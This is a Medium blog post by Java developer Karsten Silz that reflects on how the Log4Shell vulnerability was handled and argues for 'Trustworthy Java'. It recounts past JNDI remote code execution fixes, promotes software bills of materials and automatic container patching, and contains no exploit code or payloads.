Log4Shell Shows The Need for “Trustworthy Java”

What Just Happened?

  1. How did we handle Log4Shell?
  2. How can we prevent another Log4Shell?

How Did We Handle Log4Shell?

  1. Establish a team to handle the crisis, with a single person in charge.
  2. Set up centralized channels of communication — going in and going out.
  3. Analyze the situation and get the message out about the fixes.
  4. Take in new information, adjust your fixes, adjust your message, and get the updated message out.
  5. Rinse & repeat.

How Can We Prevent Another Log4Shell?

Remote JNDI Code Execution

  • In 2015, Oracle fixed CVE-2015–4902 in Java 6, 7, and 8. This Black Hat cybersecurity presentation from 2016 showed that this vulnerability was used to attack NATO and the White House. It also discussed how to bypass Oracle’s fix.
  • This article from January 2019 details how Oracle later fixed remote JNDI code execution twice, in Java 8u121 and Java 8u191, and why attacks were still possible afterward. I think disabling remote JNDI code execution by default in Java 8u121 is the reason why we initially thought that some Java versions were immune to Log4Shell.

Deserialization Attacks

Java Security Manager

Trustworthy Java?

Trustworthy Java!

  • We Java developers probably know most direct dependencies of our Java applications. But we generally don’t know the dependencies of our dependencies. A “Software bill of materials” (SBOM) solves that issue. It’s a list of all components of an application. That’s why an SBOM can tell us quickly if our applications are vulnerable. It seems that vendors who want to sell software to the US government will need such an SBOM in the future. The ripple effects of that decision could make SBOM break through into the mainstream and change how we build our Java applications.
  • How quickly can we patch our Java applications? Well, who says that we need to do this manually? Java applications increasingly run in virtual machines and containers. Imagine how much time and money we could have saved during Log4Shell if VMware, Docker & Kubernetes had automatically updated Log4j! Sounds far-fetched? RedHat’s OpenShift apparently already does this for “blessed Java container images”.

--

--

--

Karsten Silz is a full-stack web & mobile developer with 22 years of Java experience, author, speaker, and entrepreneur.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Design Patterns

Understanding Git Basics

DRIP Network — Join My Team And Receive Complimentary AirDrops!

The State of Data Streaming

Monitoring is Dead, Long Live Observability

Extra Storage Exam Questions: Snowball, FSx for Lustre & Storage Gateway.

6 Trusted Ways For Newbies to Learn a Programming Language

Laravel: API Versioning. The Why and How.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Karsten Silz

Karsten Silz

Karsten Silz is a full-stack web & mobile developer with 22 years of Java experience, author, speaker, and entrepreneur.

More from Medium

How to Build Java Applications Today: #59

Spring AOP — Using Java annotation as pointcut expressions

Numbers and statics

Java Naming Conventions